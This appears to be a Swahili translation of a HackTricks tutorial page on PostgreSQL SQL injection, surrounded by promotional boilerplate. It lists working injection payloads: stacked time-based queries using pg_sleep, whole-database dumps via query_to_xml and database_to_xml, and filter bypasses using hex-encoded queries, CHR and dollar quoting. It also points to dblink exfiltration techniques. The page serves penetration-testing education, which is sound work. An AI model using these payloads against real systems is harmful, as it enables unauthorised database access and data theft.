.. | ||
big-binary-files-upload-postgresql.md | ||
dblink-lo_import-data-exfiltration.md | ||
network-privesc-port-scanner-and-ntlm-chanllenge-response-disclosure.md | ||
pl-pgsql-password-bruteforce.md | ||
rce-with-postgresql-extensions.md | ||
rce-with-postgresql-languages.md | ||
README.md |
Kuingiza kwa PostgreSQL
Jifunze kuhusu kuingiza AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!
Njia nyingine za kusaidia HackTricks:
- Ikiwa unataka kuona kampuni yako ikitangazwa kwenye HackTricks au kupakua HackTricks kwa PDF Angalia MIPANGO YA KUJIUNGA!
- Pata bidhaa rasmi za PEASS & HackTricks
- Gundua Familia ya PEASS, mkusanyiko wetu wa NFTs ya kipekee
- Jiunge na 💬 Kikundi cha Discord au kikundi cha telegram au tufuate kwenye Twitter 🐦 @carlospolopm.
- Shiriki mbinu zako za kuingiza kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
Ikiwa una nia ya kazi ya kuingiza na kuingiza kwa yasiyoweza kuingizwa - tunakupa kazi! (inahitajika uwezo wa kuandika na kuzungumza Kipolishi kwa ufasaha).
{% embed url="https://www.stmcyber.com/careers" %}
Ukurasa huu unalenga kueleza mbinu tofauti ambazo zinaweza kukusaidia kuchexploitisha SQLinjection iliyopatikana kwenye database ya postgresql na kuzipatia mbinu unazoweza kupata kwenye https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md
Mwingiliano wa Mtandao - Ukarabati wa Mamlaka, Skana ya Bandari, Ufunuo wa Majibu ya Changamoto ya NTLM & Uchukuzi
Moduli ya PostgreSQL dblink
inatoa uwezo wa kuunganisha kwenye mifano mingine ya PostgreSQL na kutekeleza uhusiano wa TCP. Vipengele hivi, vikiungwa mkono na utendaji wa COPY FROM
, huwezesha hatua kama vile ukarabati wa mamlaka, skanning ya bandari, na kukamata majibu ya changamoto ya NTLM. Kwa njia za kina za kutekeleza mashambulizi haya angalia jinsi ya kutekeleza mashambulizi haya.
Mfano wa Uchukuzi ukitumia dblink na vitu vikubwa
Unaweza kusoma mfano huu kuona mfano wa CTF wa jinsi ya kupakia data ndani ya vitu vikubwa na kisha kuchukua yaliyomo ya vitu vikubwa ndani ya jina la mtumiaji la kazi dblink_connect
.
Mashambulizi ya PostgreSQL: Kusoma/kuandika, RCE, ukarabati wa mamlaka
Angalia jinsi ya kudhuru mwenyeji na kuongeza mamlaka kutoka PostgreSQL katika:
{% content-ref url="../../../network-services-pentesting/pentesting-postgresql.md" %} pentesting-postgresql.md {% endcontent-ref %}
Kupitisha WAF
Vipengele vya String vya PostgreSQL
Kubadilisha strings inaweza kukusaidia kupitisha WAFs au vizuizi vingine.
Kwenye ukurasa huu unaweza kupata baadhi ya Vipengele vya Strings vinavyoweza kutumika.
Mipangilio Iliyopangwa
Kumbuka kwamba postgresql inasaidia mipangilio iliyopangwa, lakini programu kadhaa zitatoa kosa ikiwa majibu 2 yatarudi wakati inatarajia 1 tu. Lakini, bado unaweza kutumia vibaya mipangilio iliyopangwa kupitia Kuingiza ya Wakati:
id=1; select pg_sleep(10);-- -
1; SELECT case when (SELECT current_setting('is_superuser'))='on' then pg_sleep(10) end;-- -
Mbinu za XML
query_to_xml
Hii kazi itarudisha data yote katika muundo wa XML katika faili moja tu. Ni bora ikiwa unataka kudump data nyingi katika safu moja tu:
SELECT query_to_xml('select * from pg_user',true,true,'');
database_to_xml
Hii function itadump database nzima kwa muundo wa XML katika safu 1 tu (kuwa makini ikiwa database ni kubwa sana kwani unaweza kuisababishia DoS au hata mteja wako mwenyewe):
SELECT database_to_xml(true,true,'');
Strings in Hex
Ikiwa unaweza kuendesha mambo kwa kuwapitisha ndani ya string (kwa mfano kutumia kazi ya query_to_xml
). Unaweza kutumia convert_from kuwapitisha string kama hex na kuepuka mifumo ya kuchuja njia hii:
select encode('select cast(string_agg(table_name, '','') as int) from information_schema.tables', 'hex'), convert_from('\x73656c656374206361737428737472696e675f616767287461626c655f6e616d652c20272c272920617320696e74292066726f6d20696e666f726d6174696f6e5f736368656d612e7461626c6573', 'UTF8');
# Bypass via stacked queries + error based + query_to_xml with hex
;select query_to_xml(convert_from('\x73656c656374206361737428737472696e675f616767287461626c655f6e616d652c20272c272920617320696e74292066726f6d20696e666f726d6174696f6e5f736368656d612e7461626c6573','UTF8'),true,true,'')-- -h
# Bypass via boolean + error based + query_to_xml with hex
1 or '1' = (query_to_xml(convert_from('\x73656c656374206361737428737472696e675f616767287461626c655f6e616d652c20272c272920617320696e74292066726f6d20696e666f726d6174696f6e5f736368656d612e7461626c6573','UTF8'),true,true,''))::text-- -
{% endcode %}
Alama za kutumia
Ikiwa huwezi kutumia alama za nukta kwa payload yako unaweza kuzipuuza kwa kutumia CHR
kwa ajili ya misingi ya vifungu (upatanishaji wa herufi pekee unafanya kazi kwa misingi ya msingi kama vile SELECT, INSERT, DELETE, nk. Haifanyi kazi kwa taarifa zote za SQL_)
SELECT CHR(65) || CHR(87) || CHR(65) || CHR(69);
Au na $
. Hizi mizunguko ya kuuliza huleta matokeo sawa:
SELECT 'hacktricks';
SELECT $$hacktricks$$;
SELECT $TAG$hacktricks$TAG$;
Ikiwa una nia ya kazi ya udukuzi na kudukua yasiyoweza kudukuliwa - tunakupa kazi! (ujuzi wa Kipolishi wa kuandika na kusema unahitajika).
{% embed url="https://www.stmcyber.com/careers" %}
Jifunze udukuzi wa AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!
Njia nyingine za kusaidia HackTricks:
- Ikiwa unataka kuona kampuni yako ikitangazwa kwenye HackTricks au kupakua HackTricks kwa PDF Angalia MIPANGO YA KUJIUNGA!
- Pata bidhaa rasmi za PEASS & HackTricks
- Gundua Familia ya PEASS, mkusanyiko wetu wa NFTs ya kipekee
- Jiunge na 💬 Kikundi cha Discord au kikundi cha telegram au tufuate kwenye Twitter 🐦 @carlospolopm.
- Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud github repos.